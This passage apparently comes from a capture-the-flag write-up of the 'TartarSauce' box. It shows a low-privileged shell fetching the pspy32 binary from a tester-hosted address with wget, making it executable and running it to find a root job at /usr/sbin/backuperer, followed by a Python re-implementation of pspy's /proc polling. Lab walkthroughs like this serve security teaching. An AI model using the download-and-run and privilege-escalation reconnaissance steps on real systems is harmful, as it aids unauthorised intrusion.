PSPY
onuma@tartarsauce:/tmp$ wget http://10.10.14.10:8000/pspy32 ; chmod 777 pspy32
--2023-01-23 08:53:19-- http://10.10.14.10:8000/pspy32
connecting to 10.10.14.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 2656352 (2.5M) [application/octet-stream]
saving to: 'pspy32'
pspy32 100%[===================>] 2.53M 6.01MB/s in 0.4s
2023-01-23 08:53:19 (6.01 MB/s) - 'pspy32' saved [2656352/2656352]
I found out there is a cronjob process with privileges of the root user.
There is also a systemd timer that runs every 5 minutes, named backuperer.service
I want to know what they are doing.
onuma@tartarsauce:/tmp$ ./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
Executing PSPY
It’s executing a binary at /usr/sbin/backuperer.
The binary then proceeds to an archiving operation.
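As an added example (not part of the original writeup and not pspy's own code), the following Python script shows the core of what pspy does on this box: snapshot the numeric entries of /proc, read each process's Uid and cmdline, and report every PID that appeared since the last scan, so a periodic root job such as the backuperer run shows up with its UID and command line. It assumes a Linux /proc layout; SAMPLE_STATUS is a constructed status file, not captured from the target.

```python
import os
import time

# Constructed sample of /proc/<pid>/status text (not captured from the target box)
SAMPLE_STATUS = "Name:\tbackuperer\nState:\tS (sleeping)\nUid:\t0\t0\t0\t0\nGid:\t0\t0\t0\t0\n"

def parse_status(text):
    """Return (process name, real UID) from /proc/<pid>/status text; UID -1 if absent."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    uid = int(fields["Uid"].split()[0]) if "Uid" in fields else -1
    return fields.get("Name", "?"), uid

def read_cmdline(path):
    """Read a NUL-separated cmdline file; empty string if the process is gone."""
    try:
        with open(path, "rb") as f:
            return f.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return ""

def snapshot(proc_root="/proc"):
    """Return {pid: (uid, cmdline)} for every numeric entry under proc_root."""
    procs = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "status")) as f:
                name, uid = parse_status(f.read())
        except OSError:
            continue  # process exited between listdir() and open()
        cmd = read_cmdline(os.path.join(base, "cmdline")) or f"[{name}]"  # kernel threads have no cmdline
        procs[int(entry)] = (uid, cmd)
    return procs

def new_processes(before, after):
    """PIDs present in `after` but not in `before`, sorted ascending."""
    return sorted(pid for pid in after if pid not in before)

def watch(interval=0.1, proc_root="/proc"):
    """Poll proc_root every `interval` seconds (pspy's default is 100ms) and print new processes."""
    seen = snapshot(proc_root)
    while True:
        time.sleep(interval)
        now = snapshot(proc_root)
        for pid in new_processes(seen, now):
            uid, cmd = now[pid]
            print(f"{time.strftime('%H:%M:%S')} UID={uid:<5} PID={pid:<7} | {cmd}")
        seen = now

if __name__ == "__main__":
    watch()
```

Short-lived processes can still slip between two polls, which is why pspy also triggers a scan on inotify events for the watched directories.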